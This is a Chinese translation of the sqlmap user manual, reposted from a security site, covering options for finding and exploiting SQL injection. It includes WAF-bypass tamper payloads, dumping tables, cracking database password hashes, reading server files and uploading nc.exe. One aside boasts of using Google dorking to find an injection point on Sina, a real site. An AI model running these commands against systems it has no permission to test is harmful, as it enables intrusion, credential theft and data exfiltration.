ludx212

SqlMap用户手册

转自：http://www.91ri.org/6775.html

投稿者：梧桐雨发表于： 2013-07-28 　点击： 13,549

引：本文已经出了续篇，文章内容有点长，但都是精华，读者们耐心的看吧，续篇的链接在文末。

 
        1 
        http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

当给sqlmap这么一个url的时候，它会：

 
        1 
        1、判断可注入的参数 
       
        2 
          
        3 
        2、判断可以用那种SQL注入技术来注入 
       
        4 
          
        5 
        3、识别出哪种数据库 
       
        6 
          
        7 
        4、根据用户选择，读取哪些数据

sqlmap支持五种不同的注入模式：

 
        1 
        1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。 
       
        2 
          
        3 
        2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。 
       
        4 
          
        5 
        3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。 
       
        6 
          
        7 
        4、联合查询注入，可以使用union的情况下的注入。 
       
        8 
          
        9 
        5、堆查询注入，可以同时执行多条语句的执行时的注入。

sqlmap支持的数据库有：

 
        1 
        MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

可以提供一个简单的URL，Burp或WebScarab请求日志文件，文本文档中的完整http请求或者Google的搜索，匹配出结果页面，也可以自己定义一个正则来判断那个地址去测试。

测试GET参数，POST参数，HTTP Cookie参数，HTTP User-Agent头和HTTP Referer头来确认是否有SQL注入，它也可以指定用逗号分隔的列表的具体参数来测试。

可以设定HTTP(S)请求的并发数，来提高盲注时的效率。

Youtube上有人做的使用sqlmap的视频：

http://www.youtube.com/user/inquisb/videos

http://www.youtube.com/user/stamparm/videos

使用sqlmap的实例文章：

http://unconciousmind.blogspot.com/search/label/sqlmap

可以点击https://github.com/sqlmapproject/sqlmap/tarball/master下载最新版本sqlmap。

也可以使用git来获取sqlmap

 
        1 
        git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

之后可以直接使用命令来更新

 
        1 
        python sqlmap.py --update

或者

 
        1 
        git pull

更新sqlmap

如果你想观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的，可以使用-v参数。

共有七个等级，默认为1：

 
        01 
        0、只显示python错误以及严重的信息。 
       
        02 
          
        03 
        1、同时显示基本信息和警告信息。（默认） 
       
        04 
          
        05 
        2、同时显示debug信息。 
       
        06 
          
        07 
        3、同时显示注入的payload。 
       
        08 
          
        09 
        4、同时显示HTTP请求。 
       
        10 
          
        11 
        5、同时显示HTTP响应头。 
       
        12 
          
        13 
        6、同时显示HTTP响应页面。

如果你想看到sqlmap发送的测试payload最好的等级就是3。

获取目标方式

目标URL

参数：-u或者–url

格式：http(s)://targeturl[:port]/[…]

例如：python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

从Burp或者WebScarab代理中获取日志

参数：-l

可以直接吧Burp proxy或者WebScarab proxy中的日志直接倒出来交给sqlmap来一个一个检测是否有注入。

从文本中获取多个目标扫描

参数：-m

文件中保存url格式如下，sqlmap会一个一个检测

 
        1 
        www.target1.com/vuln1.php?q=foobar 
       
        2 
          
        3 
        www.target2.com/vuln2.asp?id=1 
       
        4 
          
        5 
        www.target3.com/vuln3/id/1*

 
        1 
        从文件中加载HTTP请求 
       
        2 
        参数：-r 
       
        3 
          
        4 
        sqlmap可以从一个文本文件中获取HTTP请求，这样就可以跳过设置一些其他参数（比如cookie，POST数据，等等）。 
       
        5 
          
        6 
        比如文本文件内如下：

 
        1 
        POST /vuln.php HTTP/1.1 
       
        2 
        Host: www.target.com 
       
        3 
        User-Agent: Mozilla/4.0 
       
        4 
          
        5 
        id=1

当请求是HTTPS的时候你需要配合这个–force-ssl参数来使用，或者你可以在Host头后门加上:443

处理Google的搜索结果

参数：-g

sqlmap可以测试注入Google的搜索结果中的GET参数（只获取前100个结果）。

例子：

 
        1 
        python sqlmap.py -g "inurl:".php?id=1""

（很牛B的功能，测试了一下，第十几个就找到新浪的一个注入点）

此外可以使用-c参数加载sqlmap.conf文件里面的相关配置。

请求

http数据

参数：–data

此参数是把数据以POST方式提交，sqlmap会像检测GET参数一样检测POST的参数。

例子：

 
        1 
        python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

参数拆分字符

参数：–param-del

当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。

例子：

 
        1 
        python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

HTTP cookie头

参数：–cookie,–load-cookies,–drop-set-cookie

这个参数在以下两个方面很有用：

1、web应用需要登陆的时候。

2、你想要在这些头参数中测试SQL注入时。

可以通过抓包把cookie获取到，复制出来，然后加到–cookie参数里。

在HTTP请求中，遇到Set-Cookie的话，sqlmap会自动获取并且在以后的请求中加入，并且会尝试SQL注入。

如果你不想接受Set-Cookie可以使用–drop-set-cookie参数来拒接。

当你使用–cookie参数时，当返回一个Set-Cookie头的时候，sqlmap会询问你用哪个cookie来继续接下来的请求。当–level的参数设定为2或者2以上的时候，sqlmap会尝试注入Cookie参数。

HTTP User-Agent头

参数：–user-agent,–random-agent

默认情况下sqlmap的HTTP请求头中User-Agent值是：

 
        1 
        sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

可以使用–user-anget参数来修改，同时也可以使用–random-agnet参数来随机的从./txt/user-agents.txt中获取。

当–level参数设定为3或者3以上的时候，会尝试对User-Angent进行注入。

HTTP Referer头

参数：–referer

sqlmap可以在请求中伪造HTTP中的referer，当–level参数设定为3或者3以上的时候会尝试对referer注入。

额外的HTTP头

参数：–headers

可以通过–headers参数来增加额外的http头

HTTP认证保护

参数：–auth-type,–auth-cred

这些参数可以用来登陆HTTP的认证保护支持三种方式：

1、Basic

2、Digest

3、NTLM

例子：

 
        1 
        python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP协议的证书认证

参数：–auth-cert

当Web服务器需要客户端证书进行身份验证时，需要提供两个文件:key_file，cert_file。

key_file是格式为PEM文件，包含着你的私钥，cert_file是格式为PEM的连接文件。

HTTP(S)代理

参数：–proxy,–proxy-cred和–ignore-proxy

使用–proxy代理是格式为：http://url:port。

当HTTP(S)代理需要认证是可以使用–proxy-cred参数：username:password。

–ignore-proxy拒绝使用本地局域网的HTTP(S)代理。

HTTP请求延迟

参数：–delay

可以设定两个HTTP(S)请求间的延迟，设定为0.5的时候是半秒，默认是没有延迟的。

设定超时时间

参数：–timeout

可以设定一个HTTP(S)请求超过多久判定为超时，10.5表示10.5秒，默认是30秒。

设定重试超时

参数：–retries

当HTTP(S)超时时，可以设定重新尝试连接次数，默认是3次。

设定随机改变的参数值

参数：–randomize

可以设定某一个参数值在每一次请求中随机的变化，长度和类型会与提供的初始值一样。

利用正则过滤目标网址

参数：–scope

例如：

 
        1 
        python sqlmap.py -l burp.log --scope="(www)?.target.(com|net|org)"

避免过多的错误请求被屏蔽

参数：–safe-url,–safe-freq

有的web应用程序会在你多次访问错误的请求时屏蔽掉你以后的所有请求，这样在sqlmap进行探测或者注入的时候可能造成错误请求而触发这个策略，导致以后无法进行。

绕过这个策略有两种方式：

 
        1 
        1、--safe-url：提供一个安全不错误的连接，每隔一段时间都会去访问一下。 
       
        2 
        2、--safe-freq：提供一个安全不错误的连接，每次测试请求之后都会再访问一边安全连接。

关掉URL参数值编码

参数：–skip-urlencode

根据参数位置，他的值默认将会被URL编码，但是有些时候后端的web服务器不遵守RFC标准，只接受不经过URL编码的值，这时候就需要用–skip-urlencode参数。

每次请求时候执行自定义的python代码

参数：–eval

在有些时候，需要根据某个参数的变化，而修改另个一参数，才能形成正常的请求，这时可以用–eval参数在每次请求时根据所写python代码做完修改后请求。

例子：

 
        1 
        python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

上面的请求就是每次请求时根据id参数值，做一次md5后作为hash参数的值。

注入

测试参数

参数：-p,–skip

sqlmap默认测试所有的GET和POST参数，当–level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。但是你可以手动用-p参数设置想要测试的参数。例如： -p “id,user-anget”

当你使用–level的值很大但是有个别参数不想测试的时候可以使用–skip参数。

例如：–skip=”user-angent.referer”

在有些时候web服务器使用了URL重写，导致无法直接使用sqlmap测试参数，可以在想测试的参数后面加*

例如：

 
        1 
        python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

sqlmap将会测试value1的位置是否可注入。

指定数据库

参数：–dbms

默认情况系sqlmap会自动的探测web应用后端的数据库是什么，sqlmap支持的数据库有：

 
        1 
        MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAP MaxDB、DB2

指定数据库服务器系统

参数：–os

默认情况下sqlmap会自动的探测数据库服务器系统，支持的系统有：Linux、Windows。

指定无效的大数字

参数：–invalid-bignum

当你想指定一个报错的数值时，可以使用这个参数，例如默认情况系id=13，sqlmap会变成id=-13来报错，你可以指定比如id=9999999来报错。

指定无效的逻辑

参数：–invalid-logical

原因同上，可以指定id=13把原来的id=-13的报错改成id=13 AND 18=19。

注入payload

参数：–prefix,–suffix

在有些环境中，需要在注入的payload的前面或者后面加一些字符，来保证payload的正常执行。

例如，代码中是这样调用数据库的：

 
        1 
        $query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1";

这时你就需要–prefix和–suffix参数了：

 
        1 
        python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" --suffix "AND (’abc’=’abc"

这样执行的SQL语句变成：

 
        1 
        $query = "SELECT * FROM users WHERE id=(’1’)  AND (’abc’=’abc’) LIMIT 0, 1";

修改注入的数据

参数：–tamper

sqlmap除了使用CHAR()函数来防止出现单引号之外没有对注入的数据修改，你可以使用–tamper参数对数据做修改来绕过WAF等设备。

下面是一个tamper脚本的格式：

 
        01 
        # Needed imports 
       
        02 
        from lib.core.enums import PRIORITY 
       
        03 
        # Define which is the order of application of tamper scripts against 
       
        04 
        # the payload 
       
        05 
        __priority__ = PRIORITY.NORMAL 
       
        06 
        def tamper(payload): 
       
        07 
            ''' 
       
        08 
            Description of your tamper script 
       
        09 
            ''' 
       
        10 
            retVal = payload 
       
        11 
            # your code to tamper the original payload 
       
        12 
            # return the tampered payload 
       
        13 
            return retVal

可以查看 tamper/ 目录下的有哪些可用的脚本

例如：

 
        01 
        $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 
       
        02 
          
        03 
        [hh:mm:03] [DEBUG] cleaning up configuration parameters 
       
        04 
        [hh:mm:03] [INFO] loading tamper script 'between' 
       
        05 
        [hh:mm:03] [INFO] loading tamper script 'randomcase' 
       
        06 
        [hh:mm:03] [INFO] loading tamper script 'space2comment' 
       
        07 
        [...] 
       
        08 
        [hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' 
       
        09 
        [hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092 
       
        10 
        [hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057 
       
        11 
        [hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041 
       
        12 
        [...] 
       
        13 
        [hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' 
       
        14 
        [hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar( 
       
        15 
        58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/ 
       
        16 
        ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/ 
       
        17 
        group/**/bY/**/x)a) 
       
        18 
        [hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING 
       
        19 
        clause' injectable 
       
        20 
        [...]

探测

探测等级

参数：–level

共有五个等级，默认为1，sqlmap使用的payload可以在xml/payloads.xml中看到，你也可以根据相应的格式添加自己的payload。

这个参数不仅影响使用哪些payload同时也会影响测试的注入点，GET和POST的数据都会测试，HTTP Cookie在level为2的时候就会测试，HTTP User-Agent/Referer头在level为3的时候就会测试。

总之在你不确定哪个payload或者参数为注入点的时候，为了保证全面性，建议使用高的level值。

风险等级

参数：–risk

共有四个风险等级，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。

在有些时候，例如在UPDATE的语句中，注入一个OR的测试语句，可能导致更新的整个表，可能造成很大的风险。

测试的语句同样可以在xml/payloads.xml中找到，你也可以自行添加payload。

页面比较

参数：–string,–not-string,–regexp,–code

默认情况下sqlmap通过判断返回页面的不同来判断真假，但有时候这会产生误差，因为有的页面在每次刷新的时候都会返回不同的代码，比如页面当中包含一个动态的广告或者其他内容，这会导致sqlmap的误判。此时用户可以提供一个字符串或者一段正则匹配，在原始页面与真条件下的页面都存在的字符串，而错误页面中不存在（使用–string参数添加字符串，–regexp添加正则），同时用户可以提供一段字符串在原始页面与真条件下的页面都不存在的字符串，而错误页面中存在的字符串（–not-string添加）。用户也可以提供真与假条件返回的HTTP状态码不一样来注入，例如，响应200的时候为真，响应401的时候为假，可以添加参数–code=200。

参数：–text-only,–titles

有些时候用户知道真条件下的返回页面与假条件下返回页面的不同位置在哪里可以使用–text-only（HTTP响应体中不同）–titles（HTML的title标签中不同）。

注入技术

测试是否是注入

参数：–technique

这个参数可以指定sqlmap使用的探测技术，默认情况下会测试所有的方式。

支持的探测方式如下：

 
        1 
        B: Boolean-based blind SQL injection（布尔型注入） 
       
        2 
        E: Error-based SQL injection（报错型注入） 
       
        3 
        U: UNION query SQL injection（可联合查询注入） 
       
        4 
        S: Stacked queries SQL injection（可多语句查询注入） 
       
        5 
        T: Time-based blind SQL injection（基于时间延迟注入）

设定延迟注入的时间

参数：–time-sec

当使用继续时间的盲注时，时刻使用–time-sec参数设定延时时间，默认是5秒。

设定UNION查询字段数

参数：–union-cols

默认情况下sqlmap测试UNION查询注入会测试1-10个字段数，当–level为5的时候他会增加测试到50个字段数。设定–union-cols的值应该是一段整数，如：12-16，是测试12-16个字段数。

设定UNION查询使用的字符

参数：–union-char

默认情况下sqlmap针对UNION查询的注入会使用NULL字符，但是有些情况下会造成页面返回失败，而一个随机整数是成功的，这是你可以用–union-char指定UNION查询的字符。

二阶SQL注入

参数：–second-order

有些时候注入点输入的数据看返回结果的时候并不是当前的页面，而是另外的一个页面，这时候就需要你指定到哪个页面获取响应判断真假。–second-order后门跟一个判断页面的URL地址。

列数据

标志

参数：-b,–banner

大多数的数据库系统都有一个函数可以返回数据库的版本号，通常这个函数是version()或者变量@@version这主要取决与是什么数据库。

用户

参数：–current-user

在大多数据库中可以获取到管理数据的用户。

当前数据库

参数：–current-db

返还当前连接的数据库。

当前用户是否为管理用

参数：–is-dba

判断当前的用户是否为管理，是的话会返回True。

列数据库管理用户

参数：–users

当前用户有权限读取包含所有用户的表的权限时，就可以列出所有管理用户。

列出并破解数据库用户的hash

参数：–passwords

当前用户有权限读取包含用户密码的表的权限时，sqlmap会现列举出用户，然后列出hash，并尝试破解。

例子：

 
        01 
        $ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1 
       
        02 
        [...] 
       
        03 
        back-end DBMS: PostgreSQL 
       
        04 
        [hh:mm:38] [INFO] fetching database users password hashes 
       
        05 
        do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y 
       
        06 
        [hh:mm:42] [INFO] using hash method: 'postgres_passwd' 
       
        07 
        what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt] 
       
        08 
        [hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt' 
       
        09 
        do you want to use common password suffixes? (slow!) [y/N] n 
       
        10 
        [hh:mm:48] [INFO] starting dictionary attack (postgres_passwd) 
       
        11 
        [hh:mm:49] [INFO] found: 'testpass' for user: 'testuser' 
       
        12 
        [hh:mm:50] [INFO] found: 'testpass' for user: 'postgres' 
       
        13 
        database management system users password hashes: 
       
        14 
        [*] postgres [1]: 
       
        15 
            password hash: md5d7d880f96044b72d0bba108ace96d1e4 
       
        16 
            clear-text password: testpass 
       
        17 
        [*] testuser [1]: 
       
        18 
            password hash: md599e5ea7a6f7c3269995cba3927fd0093 
       
        19 
            clear-text password: testpass

可以看到sqlmap不仅勒出数据库的用户跟密码，同时也识别出是PostgreSQL数据库，并询问用户是否采用字典爆破的方式进行破解，这个爆破已经支持Oracle和Microsoft SQL Server。

也可以提供-U参数来指定爆破哪个用户的hash。

列出数据库管理员权限

参数：–privileges

当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的权限，sqlmap将会告诉你哪个是数据库的超级管理员。也可以用-U参数指定你想看哪个用户的权限。

列出数据库管理员角色

参数：–roles

当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的角色，也可以用-U参数指定你想看哪个用户的角色。

仅适用于当前数据库是Oracle的时候。

列出数据库系统的数据库

参数：–dbs

当前用户有权限读取包含所有数据库列表信息的表中的时候，即可列出所有的数据库。

列举数据库表

参数：–tables,–exclude-sysdbs,-D

当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出一个特定数据的所有表。

如果你不提供-D参数来列指定的一个数据的时候，sqlmap会列出数据库所有库的所有表。

–exclude-sysdbs参数是指排除了所有的系统数据库。

需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是数据库名称。

列举数据库表中的字段

参数：–columns,-C,-T,-D

当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出指定数据库表中的字段，同时也会列出字段的数据类型。

如果没有使用-D参数指定数据库时，默认会使用当前数据库。

列举一个SQLite的例子：

 
        01 
        $ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users -C name 
       
        02 
        [...] 
       
        03 
        Database: SQLite_masterdb 
       
        04 
        Table: users 
       
        05 
        [3 columns] 
       
        06 
        +---------+---------+ 
       
        07 
        | Column  | Type    | 
       
        08 
        +---------+---------+ 
       
        09 
        | id      | INTEGER | 
       
        10 
        | name    | TEXT    | 
       
        11 
        | surname | TEXT    | 
       
        12 
        +---------+---------+

列举数据库系统的架构

参数：–schema,–exclude-sysdbs

用户可以用此参数获取数据库的架构，包含所有的数据库，表和字段，以及各自的类型。

加上–exclude-sysdbs参数，将不会获取数据库自带的系统库内容。

MySQL例子：

 
        01 
        $ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --schema --batch --exclude-sysdbs 
       
        02 
        [...] 
       
        03 
        Database: owasp10 
       
        04 
        Table: accounts 
       
        05 
        [4 columns] 
       
        06 
        +-------------+---------+ 
       
        07 
        | Column      | Type    | 
       
        08 
        +-------------+---------+ 
       
        09 
        | cid         | int(11) | 
       
        10 
        | mysignature | text    | 
       
        11 
        | password    | text    | 
       
        12 
        | username    | text    | 
       
        13 
        +-------------+---------+ 
       
        14 
          
        15 
        Database: owasp10 
       
        16 
        Table: blogs_table 
       
        17 
        [4 columns] 
       
        18 
        +--------------+----------+ 
       
        19 
        | Column       | Type     | 
       
        20 
        +--------------+----------+ 
       
        21 
        | date         | datetime | 
       
        22 
        | blogger_name | text     | 
       
        23 
        | cid          | int(11)  | 
       
        24 
        | comment      | text     | 
       
        25 
        +--------------+----------+ 
       
        26 
          
        27 
        Database: owasp10 
       
        28 
        Table: hitlog 
       
        29 
        [6 columns] 
       
        30 
        +----------+----------+ 
       
        31 
        | Column   | Type     | 
       
        32 
        +----------+----------+ 
       
        33 
        | date     | datetime | 
       
        34 
        | browser  | text     | 
       
        35 
        | cid      | int(11)  | 
       
        36 
        | hostname | text     | 
       
        37 
        | ip       | text     | 
       
        38 
        | referer  | text     | 
       
        39 
        +----------+----------+ 
       
        40 
          
        41 
        Database: testdb 
       
        42 
        Table: users 
       
        43 
        [3 columns] 
       
        44 
        +---------+---------------+ 
       
        45 
        | Column  | Type          | 
       
        46 
        +---------+---------------+ 
       
        47 
        | id      | int(11)       | 
       
        48 
        | name    | varchar(500)  | 
       
        49 
        | surname | varchar(1000) | 
       
        50 
        +---------+---------------+ 
       
        51 
        [...]

获取表中数据个数

参数：–count

有时候用户只想获取表中的数据个数而不是具体的内容，那么就可以使用这个参数。

列举一个Microsoft SQL Server例子：

 
        1 
        $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb 
       
        2 
        [...] 
       
        3 
        Database: testdb 
       
        4 
        +----------------+---------+ 
       
        5 
        | Table          | Entries | 
       
        6 
        +----------------+---------+ 
       
        7 
        | dbo.users      | 4       | 
       
        8 
        | dbo.users_blob | 2       | 
       
        9 
        +----------------+---------+

获取整个表的数据

参数：–dump,-C,-T,-D,–start,–stop,–first,–last

如果当前管理员有权限读取数据库其中的一个表的话，那么就能获取这个表的所有内容。

使用-D,-T参数指定想要获取哪个库的哪个表，不适用-D参数时，默认使用当前库。

列举一个Firebird的例子：

 
        01 
        $ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users 
       
        02 
        [...] 
       
        03 
        Database: Firebird_masterdb 
       
        04 
        Table: USERS 
       
        05 
        [4 entries] 
       
        06 
        +----+--------+------------+ 
       
        07 
        | ID | NAME   | SURNAME    | 
       
        08 
        +----+--------+------------+ 
       
        09 
        | 1  | luther | blisset    | 
       
        10 
        | 2  | fluffy | bunny      | 
       
        11 
        | 3  | wu     | ming       | 
       
        12 
        | 4  | NULL   | nameisnull | 
       
        13 
        +----+--------+------------+

可以获取指定库中的所有表的内容，只用-dump跟-D参数（不使用-T与-C参数）。

也可以用-dump跟-C获取指定的字段内容。

sqlmap为每个表生成了一个CSV文件。

如果你只想获取一段数据，可以使用–start和–stop参数，例如，你只想获取第一段数据可以使用–stop 1，如果想获取第二段与第三段数据，使用参数 –start 1 –stop 3。

也可以用–first与–last参数，获取第几个字符到第几个字符的内容，如果你想获取字段中第三个字符到第五个字符的内容，使用–first 3 –last 5，只在盲注的时候使用，因为其他方式可以准确的获取注入内容，不需要一个字符一个字符的猜解。

获取所有数据库表的内容

参数：–dump-all,–exclude-sysdbs

使用–dump-all参数获取所有数据库表的内容，可同时加上–exclude-sysdbs只获取用户数据库的表，需要注意在Microsoft SQL Server中master数据库没有考虑成为一个系统数据库，因为有的管理员会把他当初用户数据库一样来使用它。

搜索字段，表，数据库

参数：–search,-C,-T,-D

–search可以用来寻找特定的数据库名，所有数据库中的特定表名，所有数据库表中的特定字段。

可以在一下三种情况下使用：

 
        1 
        -C后跟着用逗号分割的列名，将会在所有数据库表中搜索指定的列名。 
       
        2 
        -T后跟着用逗号分割的表名，将会在所有数据库中搜索指定的表名 
       
        3 
        -D后跟着用逗号分割的库名，将会在所有数据库中搜索指定的库名。

运行自定义的SQL语句

参数：–sql-query,–sql-shell

sqlmap会自动检测确定使用哪种SQL注入技术，如何插入检索语句。

如果是SELECT查询语句，sqlmap将会输出结果。如果是通过SQL注入执行其他语句，需要测试是否支持多语句执行SQL语句。

列举一个Mircrosoft SQL Server 2000的例子：

 
        01 
        $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1 
       
        02 
          
        03 
        [...] 
       
        04 
        [hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo'' 
       
        05 
        [hh:mm:14] [INFO] retrieved: foo 
       
        06 
        SELECT 'foo':    'foo' 
       
        07 
          
        08 
        $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2 
       
        09 
          
        10 
        [...] 
       
        11 
        [hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar'' 
       
        12 
        [hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into  
       
        13 
        distinct queries to be able to retrieve the output even if we are going blind 
       
        14 
        [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),  
       
        15 
        (CHAR(32))) 
       
        16 
        [hh:mm:50] [INFO] retrieved: foo 
       
        17 
        [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds 
       
        18 
        [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),  
       
        19 
        (CHAR(32))) 
       
        20 
        [hh:mm:50] [INFO] retrieved: bar 
       
        21 
        [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds 
       
        22 
        SELECT 'foo', 'bar':    'foo, bar'

爆破

暴力破解表名

参数：–common-tables

当使用–tables无法获取到数据库的表时，可以使用此参数。

通常是如下情况：

 
        1 
        1、MySQL数据库版本小于5.0，没有information_schema表。 
       
        2 
        2、数据库是Microssoft Access，系统表MSysObjects是不可读的（默认）。 
       
        3 
        3、当前用户没有权限读取系统中保存数据结构的表的权限。

暴力破解的表在txt/common-tables.txt文件中，你可以自己添加。

列举一个MySQL 4.1的例子：

 
        01 
        $ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner 
       
        02 
          
        03 
        [...] 
       
        04 
        [hh:mm:39] [INFO] testing MySQL 
       
        05 
        [hh:mm:39] [INFO] confirming MySQL 
       
        06 
        [hh:mm:40] [INFO] the back-end DBMS is MySQL 
       
        07 
        [hh:mm:40] [INFO] fetching banner 
       
        08 
        web server operating system: Windows 
       
        09 
        web application technology: PHP 5.3.1, Apache 2.2.14 
       
        10 
        back-end DBMS operating system: Windows 
       
        11 
        back-end DBMS: MySQL < 5.0.0 
       
        12 
        banner:    '4.1.21-community-nt' 
       
        13 
          
        14 
        [hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt' 
       
        15 
        [hh:mm:40] [INFO] adding words used on web page to the check list 
       
        16 
        please enter number of threads? [Enter for 1 (current)] 8 
       
        17 
        [hh:mm:43] [INFO] retrieved: users 
       
        18 
          
        19 
        Database: testdb 
       
        20 
        [1 table] 
       
        21 
        +-------+ 
       
        22 
        | users | 
       
        23 
        +-------+

暴力破解列名

参数：–common-columns

与暴力破解表名一样，暴力跑的列名在txt/common-columns.txt中。

用户自定义函数注入

参数：–udf-inject,–shared-lib

你可以通过编译MySQL注入你自定义的函数（UDFs）或PostgreSQL在windows中共享库，DLL，或者Linux/Unix中共享对象，sqlmap将会问你一些问题，上传到服务器数据库自定义函数，然后根据你的选择执行他们，当你注入完成后，sqlmap将会移除它们。

系统文件操作

从数据库服务器中读取文件

参数：–file-read

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。

列举一个Microsoft SQL Server 2005的例子：

 
        01 
        $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther"  
       
        02 
        --file-read "C:/example.exe" -v 1 
       
        03 
          
        04 
        [...] 
       
        05 
        [hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server 
       
        06 
        web server operating system: Windows 2000 
       
        07 
        web application technology: ASP.NET, Microsoft IIS 6.0, ASP 
       
        08 
        back-end DBMS: Microsoft SQL Server 2005 
       
        09 
          
        10 
        [hh:mm:50] [INFO] fetching file: 'C:/example.exe' 
       
        11 
        [hh:mm:50] [INFO] the SQL query provided returns 3 entries 
       
        12 
        C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/C__example.exe' 
       
        13 
        [...] 
       
        14 
          
        15 
        $ ls -l output/192.168.136.129/files/C__example.exe  
       
        16 
        -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe 
       
        17 
          
        18 
        $ file output/192.168.136.129/files/C__example.exe  
       
        19 
        output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 
       
        20 
        80386 32-bit

把文件上传到数据库服务器中

参数：–file-write,–file-dest

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。

列举一个MySQL的例子：

 
        01 
        $ file /software/nc.exe.packed  
       
        02 
        /software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit 
       
        03 
          
        04 
        $ ls -l /software/nc.exe.packed 
       
        05 
        -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed 
       
        06 
          
        07 
        $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write  
       
        08 
        "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1 
       
        09 
          
        10 
        [...] 
       
        11 
        [hh:mm:29] [INFO] the back-end DBMS is MySQL 
       
        12 
        web server operating system: Windows 2003 or 2008 
       
        13 
        web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 
       
        14 
        back-end DBMS: MySQL >= 5.0.0 
       
        15 
          
        16 
        [...] 
       
        17 
        do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully  
       
        18 
        written on the back-end DBMS file system? [Y/n] y 
       
        19 
        [hh:mm:52] [INFO] retrieved: 31744 
